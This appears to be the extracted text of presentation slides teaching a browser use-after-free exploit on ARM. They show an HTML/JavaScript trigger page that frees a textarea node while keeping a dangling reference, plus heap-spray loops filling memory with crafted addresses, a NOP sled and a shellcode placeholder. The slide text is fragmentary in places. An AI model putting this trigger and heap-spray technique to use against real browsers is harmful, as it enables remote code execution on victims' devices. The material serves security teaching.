49. 0x0000a000 0x00650000 0x00385100 var elem1 = doc.getElementsByTagName("textarea") var elem2 = doc.getElementById("target") <body > <textarea id=”target” rows=20>blah</textarea> <body> We make references to the element in 2 different ways
50. 0x0000a000 0x00650000 0x00385100 var elem1 = doc.getElementsByTagName("textarea") var elem2 = doc.getElementById("target") elem2.parentNode.removeChild(target); <body > <textarea id=”target” rows=20>blah</textarea> <body> We remove the element using our second reference. This essentially unlocks the memory that both variables are referencing. The elem1 var retains its pointer to the deallocated spot in memory
51. 0x0000a000 0x00650000 var elem1 = doc.getElementsByTagName("textarea") elem2.parentNode.removeChild(target); <body > <body> We are left with a pointer to memory that is deallocated. We can now reallocate this memory
52. 0x0000a000 0x00650000 var elem1 = doc.getElementsByTagName("textarea") elem2.parentNode.removeChild(target); for (var i = 0; i < 10000; i++) { var s = new String("LALA"); } <body > <body> Using a for loop we can create the same small string over and over until we collect garbage and refill the memory with our new data
53. 0x0000a000 0x00650000 var elem1 = doc.getElementsByTagName("textarea") elem2.parentNode.removeChild(target); for (var i = 0; i < 10000; i++) { var s = new String("LALA"); } elem1.innerHtml <body > <body> We can now request data from our original variable. LALA LALA LALA LALA LALA LALA LALA LALA LALA LALA LALA LALA LALA LALA LALA LALA LALA LALA
54. <html> <head> <script> function test() { var elem = document.getElementById("t"); // reference to textarea tag var nodes = document.getElementById("t").getAttributeNode('rows').childNodes; // reference to the child nodes of the rows under the textarea tag document.body.removeChild(elem); // remove element elem.getAttributeNode('rows').removeChild(nodes[0]); // remove child nodes setTimeout( function() { for (var i = 0; i < 10000; i++) {var s = new String("abc"); }; // call heap garbage collector nodes[0].textContent }, 0); // ask for text contained in object that no longer exists } </script> </head> <body onload=test()> <textarea id=t rows=20>textarea</textarea> <!-- element we are targeting --> </body> </html>
61. What does that mean 4a57a: 6d42 ldr r2, [r0, #84] = goto address in r0 + 84 , put in r2 4a57c: 1c20 adds r0, r4, #0 4a57e: 4790 blx r2 = goto address in r2 and start executing
62.
63.
64. Controlling the Heap 0x0000a000 0x00640000 The heap will place data in the next available spot that is big enough. We can use this to control the end of the heap
65. The Goal 0x0000a000 0x00640000 We use the loop below to populate our “use after free” for (var i = 0; i < 70000; i++) {var s = new String(unescape("00580058")); }; T
66. The Goal 0x0000a000 0x00640000 We use the loop below to populate our “use after free” for (var i = 0; i < 70000; i++) {var s = new String(unescape("00580058")); }; = 0x00580058 T
67. The Goal 0x0000a000 0x00640000 var scode = unescape("00600060"); var scode2 = unescape("5005e1a0"); do { scode += scode; scode2 += scode2; } while (scode.length<=0x1000); scode2 += shell target = new Array(); for(i = 0; i < 300; i++){ if (i<130){ target[i] = scode;} if (i>130){ target[i] = scode2;} document.write(target[i]); document.write("<br />"); if (i>250){ = 0x00580058 T
68. The Goal 0x0000a000 0x00640000 Scode = 0x00600060 len = 0x1000 We write this value to the page 130 times = 0x00580058 = 0x00600060 0x00580058 T 00600060 00600060 00600060 00600060
69. The Goal 0x0000a000 0x00640000 Scode2 = 0xe1a05005 len = 0x1000 + shellcode We write this value to the page 120 times = 0x00580058 = 0x00600060 0x00580058 = 0xe1a05005 + shellcode 0x00600060 T 00600060 00600060 00600060 00600060 Nop + shell Nop + shell Nop + shell Nop + shell
70. The Goal 0x0000a000 0x00640000 1. We access our “use after free” address 2. That address sends us to 0x00580058 The value at 0x00580058 is 0x00600060 This is loaded into r2 3. pc goes to the address in r2 and starts execution = 0x00580058 = 0x00600060 = 0xe1a05005 + shellcode 0x00600060 nodes[0].textContent = 0xe1a05005 + shellcode T 00600060 00600060 00600060 00600060 Nop + shell Nop + shell Nop + shell Nop + shell